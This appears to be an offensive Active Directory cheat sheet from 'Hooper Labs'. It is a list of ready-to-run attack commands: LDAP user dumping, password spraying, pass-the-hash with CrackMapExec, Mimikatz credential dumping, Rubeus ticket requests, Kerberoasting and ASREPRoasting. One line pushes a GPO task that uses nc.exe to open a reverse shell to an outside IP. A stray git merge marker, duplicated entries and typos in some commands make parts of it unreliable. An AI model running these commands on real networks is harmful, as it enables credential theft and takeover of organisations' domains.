Hooper Labs

Active Directory

Dump Domain (ldapdomaindump)

	ldapdomaindump ldap://<domain> -u 'DOMAIN\user' -p 'password'

Dump Users (nmap)

	nmap -p 389 --script-args 'ldap.username="cn=myUser,cn=users,dc=myDomain,dc=local",ldap.password=P@ssw0rd,ldap.qfilter=users,ldap.attrip=sAMAccountName' myDomain.local

Return list of users

	cat domain_users.grep | awk '{print $1}' > users.txt

Return list of computers + IPs

	cat domain_computers.grep | awk '{print $3}' | grep -v dNS | xargs dig a @192.168.105.10 | grep kortana.local | egrep -v "^;" | awk '{print $5"-"$1}' | cut -d '.' -f1-4 | tr [[:lower:]] [[:upper:]]

mkdir in a loop

	for dir in $(cat domain_computers.grep | awk '{print $3}' | grep -v dNS | xargs dig a @192.168.105.10 | grep kortana.local | egrep -v "^;" | awk '{print $5"-"$1}' | cut -d '.' -f1-4 | tr [[:lower:]] [[:upper:]]); do mkdir ~/$dir; done

Password Spraying

Password Spraying (CrackMapExec)

	crackmapexec smb -u /path/to/users.txt -p /path/to/passwords.txt 192.168.0.0/24

<<<<<<< HEAD

Spray with Local Administrator Password

	crackmapexec smb 192.168.0.0/24 -u Administrator --local-auth -H 

Remote Desktop

	xfreerdp /u:DOMAIN\user /p: /v:

Rubeus (get TGT and apply to new process)

	Rubeus.exe asktgt /user: /rc4: /createnetonly:cmd.exe /show /domain: /dc:

Mimikatz programmatically dump passwords

	mimikatz.exe "privilege::debug" "log .\logs\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit

Create Immediate GPO Task

	SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author "DOMAIN\user" --Command "cmd.exe" --Arguments "/c C:\Temp\nc.exe -v 192.168.99.21 443 -e cmd"  --GPOName Name-of-GPO

Local Administrator Password

	crackmapexec smb 192.168.0.0/24 -u Administrator --local-auth -H <NTLM:hash>

Remote Desktop

	xfreerdp /u:DOMAIN\user /p:<pass> /v:<ip>

Rubeus (get TGT and apply to new process)

	Rubeus.exe asktgt /user:<user> /rc4:<NTLM hash> /createnetonly:cmd.exe /show /domain:<domain> /dc:<dc-ip>

Mimikatz programmatically dump passwords

	mimikatz.exe "privilege::debug" "log .\logs\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit

Kerberoast

Find Service Accounts (PowerView)

	Get-NetUser -SPN

Find Service Accounts (PowerShell)

	Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Find Service Accounts (Impacket)

	python GetUserSPNs.py domain.local/domainUser:abc123 -outputfile outfile.txt

Do Kerberoasting (PowerView)

	Invoke-Kerberoast

ASREPRoast

ASREPRoast (PowerView)

	Get-DomainUser -PreauthNotRequired -Verbose

ASREPRoast (PowerShell)

	Get-ADUser -Filter {DoesNoteRequirePreAuth -eq $True} -Properties DoesNoteRequirePreAuth

Do ASREPRoasting, targeted user

	Get-ASREPHash -UserName myUser -Verbose

Do ASREPRoasting, all users

	Invoke-ASREPRoast -Verbose

Do ASREPRoasting (Rubeus)

	.\Rubeus.exe asreproast /outfile:outfile.txt

Do ASREPRoasting (Impacket)

	python GetNPUsers.py domain.local/ -usersfile users.txt -outputfile outfile.txt

Force Set SPN (in order to kerberoast an account!)

Set SPN on Account (PowerView)

	Set-DomainObject myUSer -Set @{serviceprincipalname='ops/whatever1'}

Set SPN on Account (PowerShell)

	Set-ADUser -Identiny  -ServicePrincipalNames @{Add='ops/whatever1'}